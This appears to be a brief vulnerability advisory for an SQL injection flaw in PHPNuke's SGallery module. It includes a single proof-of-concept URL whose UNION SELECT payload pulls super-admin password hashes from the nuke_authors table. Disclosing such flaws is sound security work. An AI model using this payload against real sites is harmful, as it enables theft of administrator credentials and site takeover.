SGallery Module For PHPNuke SQL Injection Vulnerability

info
discussion
exploit
solution
references

SGallery Module For PHPNuke SQL Injection Vulnerability

An exploit is not required.

The following proof of concept example is available:
http://www.example.com/nuke75/modules/Sgallery/imageview.php?idimage=-99/**/UNION/**/SELECT/**/pwd/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1